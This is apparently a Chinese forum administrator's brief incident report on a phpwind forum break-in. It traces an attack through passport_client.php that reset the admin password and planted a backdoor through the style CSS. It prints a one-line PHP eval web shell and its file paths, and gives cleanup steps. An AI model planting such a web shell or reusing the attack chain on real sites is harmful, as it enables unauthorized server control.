今天人比较累,不想多写了,也没多研究
刚刚上论坛发现密码被改,就来看了一下,发现是出大BUG了
打了补丁,慢慢分析了一下
大概情况如下:
攻击者IP如下:219.147.205.124 所在的地理位置为: 黑龙江省牡丹江市 电信
攻击者(以下简称JR)首先通过BAIDU查找肉鸡
该JR使用的关键字是 魔兽 公会 powered by phpwind
(估计是想盗号。。)
然后向passport_client.php页面POST了异常数据,测试过我的论坛没有打补丁后
浏览论坛找到我的管理员帐号
再次向passport_client.php页面POST了攻击代码
成功修改了我的管理员密码,进入后台
在论坛默认风格的CSS代码最后加入攻击代码
(具体代码不公布了,就是生成一个data/bbscache/admin_recors.php文件,
里面的内容是:
复制代码- <?php eval($_POST[a])?>\r\n
|
)
后面他还访问了如下地址:
/data/bbscache/admin_recors.php?=PHPE9568F34-D428-11d2-A769-00AA001ACF42
/data/bbscache/admin_recors.php?=PHPE9568F35-D428-11d2-A769-00AA001ACF42
最后通过
data/bbscache/require.php?action=editfile&dir=.&editfile=admin_record.php
撰改了后台管理记录
简单的说,大家首先要查的,是论坛风格的CSS代码,清除掉,然后再删除上面提到的几个后门文件
累了,还是先休息了,明天有空再仔细研究下。。
最后,还是要欢迎下大家来我的
www.yybug.com坐坐,研究些技术,扯扯蛋啥的,呵呵
